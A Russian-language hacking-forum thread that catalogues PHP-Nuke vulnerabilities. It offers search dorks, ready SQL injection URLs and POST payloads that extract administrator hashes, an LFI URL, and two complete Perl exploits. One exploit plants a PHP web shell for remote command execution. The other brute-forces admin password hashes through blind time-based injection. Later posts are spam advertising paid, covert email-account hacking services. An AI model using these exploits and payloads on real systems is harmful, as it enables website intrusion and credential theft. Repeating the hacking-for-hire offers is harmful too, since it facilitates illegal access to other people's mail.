|
|
Приветствую Вас Гость | RSS |
|
|
|
|
|
| | |
|
Обзор уязвимостей PHP-Nuke
| |
Decide | Дата: Среда, 14.11.2012, 11:31 | Сообщение # 31 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| язвимый продукт: PHP-NUKE module video stream Версия: 4.53 Дорк: inurl:name=Video_Stream
SQL-injections
Уязвимость в файле: watch.php PHP код: $id = $_GET['id']; $request = $_GET['request'];
if($id == "request") { // Gets the data of request video **FOR ADMIN** $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$request'"); $row = $db->sql_fetchrow($result); } else { // Check if category is adult category and requires user to accept disclaimer or if required ofr the user to be registered adultcategory($id); // Add user point for veiwing video userpointsVS(1); // adds a view to the video $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'"); $row = $db->sql_fetchrow($result); $v = $row['views']; $v++; $result = $db->sql_query("UPDATE ".$prefix."_video_stream SET views='$v' WHERE id='$id'"); // Gets the data of that video $result = $db->sql_query("SELECT * FROM ".$prefix."_video_stream WHERE id='$id'"); $row = $db->sql_fetchrow($result); }
Как видим здесь присутствуют сразу несколько sql-inj Примеры запросов: Код: /modules.php?name=Video_Stream&page=watch&id=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16%23 /modules.php?name=Video_Stream&page=watch&id=request&request=11'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16%23
Уязвимость в файле: broken.php PHP код: if($_POST['Submit']) { OpenTable(); $usernameb = $_POST['username']; $user_emailb = $_POST['user_email']; $result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_broken (username, email, brokenvidid) VALUES('$usernameb', '$user_emailb', '$id') ");
Пример запроса: Код: POST /phpnuke/modules.php?name=Video_Stream&page=broken&id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Keep-Alive: 300 Connection: keep-alive Referer: http://localhost/phpnuke....dname=3 Content-Type: application/x-www-form-urlencoded Content-Length: 90 username=',if(1=1,BENCHMARK(1559911,MD5(NOW())),1) ,1)/*&user_email=ad%40a.ru&Submit=Submit
Уязвимость в файле: search.php В этом модуле присуствуют сразу несколько sql-inj
Примеры запросов: 1. /phpnuke/modules.php?name=Video_Stream&page=search в поле search: Код: 44' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16/*
2. Код: POST /phpnuke/modules.php?name=Video_Stream&page=search HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Connection: keep-alive Referer: http://localhost/phpnuke/modules.php?name=Video_Stream&page=search Content-Type: application/x-www-form-urlencoded Content-Length: 138 PHPSESSID=1960d2f98b8657b6e5bdf140c2f8c8ec&orderby=0&categoryby=31' union/**/select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16%23&sortvids=Sort
Уязвимость в файле: comment.php PHP код: $commenttopost = $_POST['comment']; // Check if no comment if($commenttopost == "") { die(""._NOCOMMENTENT.""); } $date = date("h:i A dS M Y"); $username = $looker; // Strips out HTML and Censored Words filter_text($commenttopost, 'nohtml'); // ********************************** userpointsVS(2); $result = $db->sql_query("INSERT INTO ".$prefix."_video_stream_comments (vidid, user, date, comment) VALUES ('$id', '$username', '$date', '$EditedMessage') ");
в куки кидаем: Код: id=СУЩЕСТВУЮЩИЙ_ID', 'admin', '12:02 AM 15th Dec 2008',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1))/*
В результате получим комментарий содержащий aid:hash администратора
|
|
| |
Decide | Дата: Среда, 14.11.2012, 11:32 | Сообщение # 32 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Уязвимый продукт: PHP-NUKE module auktion Версия: 2.0 Дорк: inurl:modules.php?name=auktion
SQL-injections
В модуле отсутствует какая-либо защита от sql-inj, уязвимости присуствуют почти во всех файлах
Примеры запросов: Код: /modules.php?name=auktion&file=viewitem&item=4%0aunion+select+1,2,3,4,5,6,7,8,9,0,11,12,13 ,14,15,16,17,18,19,20,21 /modules.php?name=auktion&file=catlist&catid=29'%0aunion+select+1,2,3,4,5,6,7%23 /modules.php?name=auktion&file=searchit&query='%0aunion+select+1,2,3,4,5,6,7/* /modules.php?name=auktion&file=edititem&item=-3'%0aunion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21%23
Код: POST /modules.php?name=auktion&file=edititem HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Keep-Alive: 300 Connection: keep-alive Referer: http://localhost/nuke81/modules.php?name=auktion&file=edititem&item=3 Cookie: lang=english; admin=YWRtaW46OTZlNzkyMTg5NjVlYjcyYzkyYTU0OWRkNWEz MzAxMTI6; user=MjphZG1pbjo5NmU3OTIxODk2NWViNzJjOTJhNTQ5ZGQ1Y TMzMDExMjoxMDo6MDowOjA6MDo6NDA5Ng%3D%3D; Content-Type: application/x-www-form-urlencoded Content-Length: 105 name=auktion&file=update&item=3&desc=4',title=(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1)/*
|
|
| | |
Decide | Дата: Четверг, 15.11.2012, 09:38 | Сообщение # 34 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Topic : Php-Nuke Bug type : Local File Include Vulnerability Author : ItSecTeam ===================== Content ====================== ( # Advisory Content : Php-Nuke Lastest Version ( # Mail : Bug@ItSecTeam.com ( # Dork : Php-Nuke Lastest Version ( # We Are : M3hr@n.S , 0xd41684c654 And All Team Members! ( # Find By : Amin Shokohi(Pejvak!) ( # Published: 2010-03-14 ================================================= ============================================= Exploit ======================================= ( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name ( Ex : http://Site.cOm/PHP-Nuk....e=panel ================================================== =================================
# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit # Author/s: Dante90 & yawn # Contact Us: www.unitx.net # Requirements: magic_quotes_gpc : off # Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net # You will remember, Watson, how the dreadful business of the # Abernetty family was first brought to my notice by the depth which the # parsley had sunk into the butter upon a hot day. # -- Sherlock Holmes
Code use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; sub Nuke::Usage { print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit\n"; print " ------------------------------------------------------ \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\ *\n"; print " * perl name_exploit.pl [host] [username] [password] *\n"; print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <- *\n"; print " ------------------------------------------------------ \n"; print " * Powered By Dante90 & yawn *\n"; print " * www.unitx.net *\n"; print " ------------------------------------------------------ \n"; } #VARS system $^O eq 'MSWin32' ? 'cls' : 'clear'; Nuke::Usage(); my $host = shift || die; my $cmd; my $shell = "<?php echo system(\$_GET[\"cmd\"]); ?>"; # Change Here to Set your custom shell (for example use system() ); my $cookies = HTTP::Cookies->new; my $request = LWP::UserAgent->new; $request->agent("Mozilla 5/0"); $request->cookie_jar($cookies); #END VARS sub Full_Path_Disclosure() { my $Get = $request->get($host.'themes/NukeNews/theme.php'); if ($Get->content =~ /No such file or directory in <b>(.+?)</b> on line/i) { return $1; } else { return "failed"; } } print " * Getting Full Path\n"; my $path = Full_Path_Disclosure(); die " * Failed Path Extraction" if ($path eq "failed"); $path =~ s/themes(/|)NukeNews(/|)theme.php//g; print " * Full Path Found: $path\n"; if ($path =~ m//) { $path =~ s///g; } print " * Injecting Shell To $host\n"; my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF", { check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM `nuke_authors` INTO OUTFILE '$path"."rce.php", }, Referer => $host."index.php"); print " * Injecting Successfully Completed\n"; print " * Shell now available on $host"."rce.php\n"; print " * Connecting to remote shell\n"; sleep(4); print " * Connected.. Type \"quit\" to quit\n"; while() { print "* root\@backdoor ~\$ "; $cmd = <>; chomp($cmd); last if $cmd eq "quit"; $req2 = $request->get($host."/rce.php?cmd=".$cmd); print $req2->content."\n"; }
# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, # Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # ---- # Why have I decided to publish this? # Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published # my own exploit, with their names. # FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE # ----
Code #!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, # Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # Web Site: www.warwolfz.org # My Wagend (Dante90): dante90wwz.altervista.org # ---- # Why have I decided to publish this? # Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published # my own exploit, with their names. # FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE # ---- use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Headers; use Time::HiRes; my $Victime = shift or &usage; my $Hash = ""; my ($Referer,$Time,$Response); my ($Start,$End); my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,10 2); my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add'); my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, default_headers => HTTP::Headers->new, ) or die $!; my $WaRWolFz = "http://www.warwolfz.org/"; my $DefaultTime = request($WaRWolFz); my $Post; sub Blind_SQL_Jnjection { my ($dec,$hex,$Victime) = @_; return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark( 250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}"; } for(my $I=1; $I<=32; $I++){ #N Hash characters for(my $J=0; $J<=15; $J++){ #0 -> F $Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime); $Time = request($Post); sleep(3); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); if ($Time > 4) { $Time = request($Post); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); if ($Time > 4) { syswrite(STDOUT,chr($chars[$J])); $Hash .= chr($chars[$J]); $Time = request($Post); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); last; } } } if($I == 1 && length $Hash < 1 && !$Hash){ print " * Exploit Failed *\n"; print " -------------------------------------------------------- \n"; exit; } if($I == 32){ print " * Exploit Successfully Executed *\n"; print " -------------------------------------------------------- \n"; system("pause"); } } sub request{ $Post = $_[0]; $Start = Time::HiRes::time(); my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', { title => "Dante90", url => $Post, description => "WaRWolFz Crew", auth_name => "Dante90", email => "dante90.dmc4\@hotmail.it", filesize => "1024", version => "1", homepage => "http://www.warwolfz.org/", d_op => "Add" }, Referer => $HostName.'modules.php?name=Downloads&d_op=Add'); $Response->is_success() or die "$HostName : ", $Response->message, "\n"; $End = Time::HiRes::time(); $Time = $End - $Start; return $Time; } sub usage { system("cls"); { print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n"; print " -------------------------------------------------------- \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [victime] *\n"; print " -------------------------------------------------------- \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------- \n"; }; exit; } sub refresh { system("cls"); { print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n"; print " -------------------------------------------------------- \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [victime] *\n"; print " -------------------------------------------------------- \n"; print " * Powered By Dante90, WaRWolFz Crew *\n"; print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n"; print " ------------------------------------------------------- \n"; }; print " * Victime Site: " . $_[0] . "\n"; print " * Default Time: " . $_[1] . " seconds\n"; print " * BruteForcing Hash: " . chr($_[2]) . "\n"; print " * BruteForcing N Char Hash: " . $_[5] . "\n"; print " * SQL Time: " . $_[4] . " seconds\n"; print " * Hash: " . $_[3] . "\n"; } #WaRWolFz Crew
|
|
| |
revers | Дата: Четверг, 25.05.2017, 09:20 | Сообщение # 35 |
Рядовой
Группа: Пользователи
Сообщений: 7
Статус: Offline
| ++++ ВНИМАНИЕ! ВНИМАНИЕ! ВНИМАНИЕ! +++++
ВАМ НУЖЕН АНОНИМНЫЙ ВЗЛОМ ПОЧТЫ? ВЫ ХОТИТЕ ЧТОБЫ ХОЗЯИН ПОЧТЫ НИ О ЧЕМ НЕ УЗНАЛ? ВАМ НУЖНЫ КАЧЕСТВЕННЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА ПОЧТЫ? ВЫ СОМНЕВАЕТЕСЬ ЗАКАЗЫВАТЬ У КОГО ТО?
МЫ ВАМ ПОМОЖЕМ! ЧТО МЫ ПРЕДЛАГАЕМ:
ВЗЛОМ ПОЧТЫ БЕЗ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ
ВЗЛОМ ПОЧТЫ БЕЗ ИЗМЕНЕНИЯ ПАРОЛЯ, ЖЕРТВА НИЧЕГО НЕ УЗНАЕТ
МЫ ПРЕДОСТАВИМ ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА КАКИЕ ПОПРОСИТЕ
МЫ ЛОМАЕМ АНОНИМНО, НИ КАКИХ ВАШИХ ДАННЫХ НЕ НУЖНО
МЫ БЕРЕМСЯ ЗА РАБОТУ СРАЗУ КАК ТОЛЬКО ПОЛУЧАЕМ ЗАКАЗ, НЕ НУЖНО ЖДАТЬ ПОДТВЕРЖДЕНИЯ
ОПЛАТИТЬ МОЖНО НЕ ИМЕЯ КОШЕЛЬКА \СЧЕТА
КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА
ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ
Код Mail.ru Yandex.ru Rambler.ru Gmail.com Корпоративные почтовые ящики тоже ломаем.
НАШИ КОНТАКТЫ САЙТ: WWW.POCHTY.COM ICQ: 318-319 = = = = = = = = = = = = = = = = = = =
|
|
| |
uawad | Дата: Пятница, 04.08.2017, 02:26 | Сообщение # 36 |
Рядовой
Группа: Пользователи
Сообщений: 6
Статус: Offline
| ПРЕДЛАГАЕМ УСЛУГИ ПО ВЗЛОМУ ПОЧТОВЫХ ЯЩИКОВ
Самые низкие цены?
Любые доказательства взлома?
Без смены пароля, пароль при взломе не меняется ? Сроки взлома от супер срочного до 7и дней?
Анонимность гарантию 1000%?
Гарантия от смены пароля?
Оплатить взлом почты можно в любом терминале?
Цитата Mail.ru Yandex.ru Rambler.ru Gmail.com Корпоративные почтовые ящики тоже ломаем.
1) НИКАКОЙ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ ВЗЛОМА 2) ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА, обговаривается индивидуально (скриншот, чтение письма, смена информации) 3) ПАРОЛЬ ПРИ ВЗЛОМЕ НЕ МЕНЯЕТСЯ, ЖЕРТВА НИ ЧЕГО НЕ ЗАПОДОЗРИТ 4) АНОНИМНОСТЬ, НИ КАКИХ ЛИЧНЫХ ДАННЫХ. КОНФИДЕНЦИАЛЬНО НА ВСЕ 1000% 5) ОПЛАТИТЬ МОЖНО В ЛЮБОМ ТЕРМИНАЛЕ, НЕ ИМЕЯ СВОЕГО КОШЕЛЬКА 6) КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА 7) ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ
бесплатно не работаем. скидки после 2х заказов. доказательства скрин, чтение вашего письма, смена данных на время, и д.р.
ДЛЯ СВЯЗИ И ЗАКАЗОВ: ICQ:318-319 сайт http://pochty.com
|
|
| |
qa_jopl | Дата: Среда, 09.08.2017, 16:40 | Сообщение # 37 |
Рядовой
Группа: Пользователи
Сообщений: 15
Статус: Offline
| ++++ ВНИМАНИЕ! ВНИМАНИЕ! ВНИМАНИЕ! +++++
ВАМ НУЖЕН АНОНИМНЫЙ ВЗЛОМ ПОЧТЫ? ВЫ ХОТИТЕ ЧТОБЫ ХОЗЯИН ПОЧТЫ НИ О ЧЕМ НЕ УЗНАЛ? ВАМ НУЖНЫ КАЧЕСТВЕННЫЕ ДОКАЗАТЕЛЬСТВА ВЗЛОМА ПОЧТЫ? ВЫ СОМНЕВАЕТЕСЬ ЗАКАЗЫВАТЬ У КОГО ТО?
МЫ ВАМ ПОМОЖЕМ! ЧТО МЫ ПРЕДЛАГАЕМ:
ВЗЛОМ ПОЧТЫ БЕЗ ПРЕДОПЛАТЫ, ОПЛАТА ТОЛЬКО ПО ФАКТУ
ВЗЛОМ ПОЧТЫ БЕЗ ИЗМЕНЕНИЯ ПАРОЛЯ, ЖЕРТВА НИЧЕГО НЕ УЗНАЕТ
МЫ ПРЕДОСТАВИМ ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА КАКИЕ ПОПРОСИТЕ
МЫ ЛОМАЕМ АНОНИМНО, НИ КАКИХ ВАШИХ ДАННЫХ НЕ НУЖНО
МЫ БЕРЕМСЯ ЗА РАБОТУ СРАЗУ КАК ТОЛЬКО ПОЛУЧАЕМ ЗАКАЗ, НЕ НУЖНО ЖДАТЬ ПОДТВЕРЖДЕНИЯ
ОПЛАТИТЬ МОЖНО НЕ ИМЕЯ КОШЕЛЬКА \СЧЕТА
КОНСУЛЬТИРОВАНИЕ СВОИХ КЛИЕНТОВ ПОСЛЕ ВЫПОЛНЕННОГО ЗАКАЗА
ПОМОГАЮ С БЕЗОПАСНОСТЬЮ ПРИ ПРОСМОТРЕ ЧУЖИХ ПОЧТОВЫХ ЯЩИКОВ
Код Mail.ru Yandex.ru Rambler.ru Gmail.com Корпоративные почтовые ящики тоже ломаем.
НАШИ КОНТАКТЫ САЙТ: WWW.POCHTY.COM ICQ: 318-319
|
|
| |
greval2008 | Дата: Вторник, 12.12.2017, 19:22 | Сообщение # 38 |
Рядовой
Группа: Пользователи
Сообщений: 6
Статус: Offline
| ++++++++++++++ ПРОВЕРЕННЫЙ СЕРВИС ++++++++++++++ ВЗЛАМЫВАЕМ ЛЮБЫЕ ПОЧТЫ ВЗЛАМЫВАЕМ 24 ЧАСА В СУТКИ
ЛОМАЕМ ДАЖЕ ТЕ ПОЧТЫ ОТ КОТОРЫХ ОТКАЗАЛИСЬ ДРУГИЕ ВЗЛОМЩИКИ
ВОССТАНАВЛИВАЕМ ЗАБЫТЫЕ ПАРОЛИ
Цитата НАШ САЙТ WWW.XAKMAIL.COM ЛОМАЕМ ПОЧТЫ ЛЮБЫХ СЕРВИСОВ
САМЫЕ НИЗКИЕ ЦЕНЫ ЛЮБЫЕ ГАРАНТИИ ЛЮБЫЕ ДОКАЗАТЕЛЬСТВА СКИДКИ И БОНУСЫ ВЫ ВСЕ ЕЩЕ ИЩИТЕ ПРОВЕРЕННОГО ВЗЛОМЩИКА? ЗАКАЖИТЕ У НАС! УБЕДИТЕСЬ!И БУДИТЕ ПОСТОННЫМ КЛИЕНТОМ!
ЗАПИШИТЕ + ЗАПОМНИТЕ + ЗАХОДИТЕ www.XakMail.comвзлом почты, e-mail, подобрать пароль к ящику, пароля почтового ящика, ящика, паролей, посмотреть переписку, недорого заказ взломать мыла заказать, профессиональный, мыло, вскрыть, недорого, дешевый, быстро, анонимно, низкие, цены, stealth, e-mail, hacker, group, mail-psw, com, mail. ru, маил. ру, мой мир, получит, доступ, яндекс, рамблер, гмаил, серсив, пасс, аккаунтов, мейла, gmail, rambler, yandex, yahoo
|
|
| |
| |
| | |
|
|
|
Понедельник, 30.12.2024, 22:05 |
|